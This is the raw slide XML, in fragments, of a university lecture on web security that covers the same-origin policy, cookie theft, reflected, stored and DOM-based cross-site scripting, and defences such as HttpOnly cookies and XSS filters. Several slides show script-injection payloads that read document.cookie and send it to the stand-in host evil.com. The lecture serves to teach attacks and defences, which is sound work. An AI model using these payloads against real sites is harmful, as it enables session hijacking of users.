              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser/plugins are free from vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not realistic, but forces the attacker to be more creative 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Basics: HTML, CSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XHR</a:t>
            </a:r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Cookie Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/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sz="225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="http://evil.com/c.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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250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DOM API for cookie access (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>.cookie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Often, the attacker's goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>property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smtClean="0"/>
              <a:t>Why?</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Exfiltration is restricted by SOP...somewhat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Suppose you click a link directing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" smtClean="0"/>
              <a:t>evil.com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smtClean="0"/>
              <a:t>JS from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> cannot read cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" smtClean="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>about injecting code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>?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smtClean="0"/>
              <a:t>If the attacker can somehow add code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" smtClean="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>, the reading and exporting cookies is easy (see above)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1001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Scripting (XSS)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XSS refers to running code from an untrusted origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually a result of a document integrity violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documents are compositions of trusted, developer-specified objects and untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing user input to be interpreted as document structure (i.e., elements) can lead to malicious code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal authentication credentials (session IDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or, more targeted unauthorized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XSS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(Type 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is included as part of a malicious link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code included in page rendered by visiting link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored (Type 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker submits malicious code to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server app persists malicious code to storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim accesses page that includes stored code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-based (Type 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purely client-side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Website, Type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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suppose we have a search site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.websearch.com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http://www.websearch.com/search?q=Christo+Wilson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chemeClr val="accent4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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r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h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35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for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Christo Wilson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0613" y="5544816"/>
            <a:ext cx="5517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Christo Wilson – Professor at Northeastern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.ccs.neu.edu/home/cbw/index.html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88898" y="2666967"/>
            <a:ext cx="2649894" cy="752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4626" y="4827522"/>
            <a:ext cx="2136501" cy="568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Website, Type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817" y="2414246"/>
            <a:ext cx="11694366" cy="6755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://www.websearch.com/search?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“http://img.com/nyan.jpg”/&gt;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chemeClr val="accent4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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6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h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15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for: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3294060" y="4855809"/>
            <a:ext cx="2095500" cy="1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XSS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31" y="1716057"/>
            <a:ext cx="10506269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://www.websearch.com/search?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.write(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 smtClean="0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 smtClean="0"/>
              <a:t>);&lt;/script&gt;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6" y="465011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0298" y="5779222"/>
            <a:ext cx="3169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Origin: www.websearch.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>session=xI4f-Qs02fd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evil.com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27312" y="4034121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websearch.com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" y="3076421"/>
            <a:ext cx="1245186" cy="124518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91215" y="5190325"/>
            <a:ext cx="4761373" cy="520997"/>
            <a:chOff x="3891215" y="5190325"/>
            <a:chExt cx="4761373" cy="52099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91215" y="5505062"/>
              <a:ext cx="4761373" cy="2062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316028" y="5190325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4) GET /?session=…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10222" y="3052867"/>
            <a:ext cx="2719709" cy="1597244"/>
            <a:chOff x="1710222" y="3052867"/>
            <a:chExt cx="2719709" cy="1597244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Curved Connector 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1710222" y="3699014"/>
              <a:ext cx="1714678" cy="951097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22598" y="305286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1) Send malicious link to the victim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18615" y="3509684"/>
            <a:ext cx="4578936" cy="1182798"/>
            <a:chOff x="3818615" y="3509684"/>
            <a:chExt cx="4578936" cy="11827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818615" y="3509684"/>
              <a:ext cx="4578936" cy="11827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24147">
              <a:off x="4431969" y="3737297"/>
              <a:ext cx="299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) GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>search?q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>=&lt;script&gt;…</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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27513" y="3987508"/>
            <a:ext cx="4488699" cy="1165217"/>
            <a:chOff x="3927513" y="3987508"/>
            <a:chExt cx="4488699" cy="1165217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3927513" y="3987508"/>
              <a:ext cx="4488699" cy="11652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724147">
              <a:off x="4950758" y="4215746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3) HTTP/1.1 200 OK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3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Website, Type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 smtClean="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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   friendly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01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What’s going on?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805404" y="4172786"/>
            <a:ext cx="6363478" cy="1525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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.body.style.backgroundImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(' http://img.com/nyan.jpg ')"&lt;/script&gt;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0474" y="5816081"/>
            <a:ext cx="1648408" cy="4478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Website, Type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 smtClean="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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1567543" y="3551852"/>
            <a:ext cx="8870302" cy="3066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   friendly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Latest Status Updates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533191" y="4282526"/>
            <a:ext cx="5567266" cy="741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 hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Monday, March 23,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0" y="4282526"/>
            <a:ext cx="741784" cy="7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XSS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605" y="1655431"/>
            <a:ext cx="9019591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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 smtClean="0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 smtClean="0"/>
              <a:t>);&lt;/script&gt;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8" y="4739432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906" y="5882073"/>
            <a:ext cx="28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Origin: www.friendly.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>session=xI4f-Qs02fd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evil.com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8032" y="4034121"/>
            <a:ext cx="147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friendly.com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7" y="3540785"/>
            <a:ext cx="1245186" cy="124518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307691" y="5224046"/>
            <a:ext cx="3344897" cy="487276"/>
            <a:chOff x="5307691" y="5224046"/>
            <a:chExt cx="3344897" cy="48727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307691" y="5557252"/>
              <a:ext cx="3344897" cy="1540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878715" y="5224046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 smtClean="0"/>
                <a:t>) GET /?session=…</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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07691" y="3638353"/>
            <a:ext cx="3344897" cy="1101079"/>
            <a:chOff x="5307691" y="3638353"/>
            <a:chExt cx="3344897" cy="110107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307691" y="3638353"/>
              <a:ext cx="3344897" cy="11010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496064">
              <a:off x="5342946" y="3799599"/>
              <a:ext cx="3087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3) GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>profile.php?uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>=…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8441" y="3976776"/>
            <a:ext cx="3144148" cy="1044932"/>
            <a:chOff x="5508441" y="3976776"/>
            <a:chExt cx="3144148" cy="10449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508441" y="3976776"/>
              <a:ext cx="3144148" cy="10449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488569">
              <a:off x="6177014" y="4431822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 smtClean="0"/>
                <a:t>) HTTP/1.1 200 OK</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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0330" y="4176550"/>
            <a:ext cx="3107608" cy="1065496"/>
            <a:chOff x="1260330" y="4176550"/>
            <a:chExt cx="3107608" cy="1065496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260330" y="4564443"/>
              <a:ext cx="3107608" cy="6776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72489">
              <a:off x="1531450" y="4176550"/>
              <a:ext cx="279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) Send link to attacker’s profile to the victim</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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049" y="2907711"/>
            <a:ext cx="7321420" cy="1123113"/>
            <a:chOff x="1356049" y="2907711"/>
            <a:chExt cx="7321420" cy="1123113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1356049" y="2907711"/>
              <a:ext cx="7321420" cy="1123113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7321420"/>
                <a:gd name="connsiteY0" fmla="*/ 1123113 h 1123113"/>
                <a:gd name="connsiteX1" fmla="*/ 1150775 w 7321420"/>
                <a:gd name="connsiteY1" fmla="*/ 258477 h 1123113"/>
                <a:gd name="connsiteX2" fmla="*/ 5200261 w 7321420"/>
                <a:gd name="connsiteY2" fmla="*/ 3440 h 1123113"/>
                <a:gd name="connsiteX3" fmla="*/ 7321420 w 7321420"/>
                <a:gd name="connsiteY3" fmla="*/ 395326 h 11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1420" h="1123113">
                  <a:moveTo>
                    <a:pt x="0" y="1123113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142032" y="784101"/>
                    <a:pt x="284065" y="445089"/>
                    <a:pt x="1150775" y="258477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2017485" y="71865"/>
                    <a:pt x="4171820" y="-19368"/>
                    <a:pt x="5200261" y="3440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6228702" y="26248"/>
                    <a:pt x="6775061" y="210787"/>
                    <a:pt x="7321420" y="395326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1434316">
              <a:off x="3324046" y="3025549"/>
              <a:ext cx="338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) Post malicious JS to profile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DOM-based XSS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08298" cy="489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your language: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/>
              <a:t>select&gt;&lt;script&gt;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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.write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“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTION value=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;”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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.location.href.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.location.href.indexOf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"default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) + 8)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“&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;”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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.write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"&lt;OPTION value=2&gt;English&lt;/OPTION&gt;"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smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>script&gt;&lt;/select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Intended usage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://site.com/page.html?default=French</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Misusage: </a:t>
            </a:r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://site.com/page.html?default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(document.cookie)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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6934199" y="1326443"/>
            <a:ext cx="4890796" cy="998363"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34764"/>
              <a:gd name="adj2" fmla="val 87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/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ocument.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is the URL displayed in the address bar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4886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1991: First version of Hypertext Markup Language (HTML) released by Sir Tim Berners-Lee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Markup language for displaying documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contained 18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, including anchor (&lt;a&gt;) a.k.a. a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1991: First version of Hypertext Transfer Protocol (HTTP) is published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Berners-Lee’s original protocol only included GET requests for HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP is more general, many request (e.g. PUT) and document types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31994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XSS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smtClean="0"/>
              <a:t>Client-side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Cookie restrictions – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Secure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Client-side filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side defenses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 smtClean="0"/>
              <a:t>Input validation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 smtClean="0"/>
              <a:t>Output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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Cookies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approach to defending against cookie stealing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly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cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server may specify that a cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>should not be exposed in the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, they are still sent with requests as normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not to be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies marked as Secure may only be sent over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Website designers should, ideally, enable both of these features</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prevent all attacks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Of course not, it only prevents cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other private data may still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from the origin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XSS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15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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… other HTTP headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-XSS-Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mode=block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POST /blah HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… other HTTP headers…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to=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dude&amp;msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;script&gt;...&lt;/script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6309" y="1485415"/>
            <a:ext cx="5281127" cy="470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Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>mechanism to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>filter "script-like" data sent as part of requests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i.e., check whether a request parameter contains data that looks like a reflected XSS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Enabled in most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>browsers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Heuristic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>defense against reflected XSS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Would this work against other XSS types?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576734"/>
            <a:ext cx="513183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defensive approach is to ensure that untrusted content can't modify document structure in unintended ways</a:t>
            </a:r>
          </a:p>
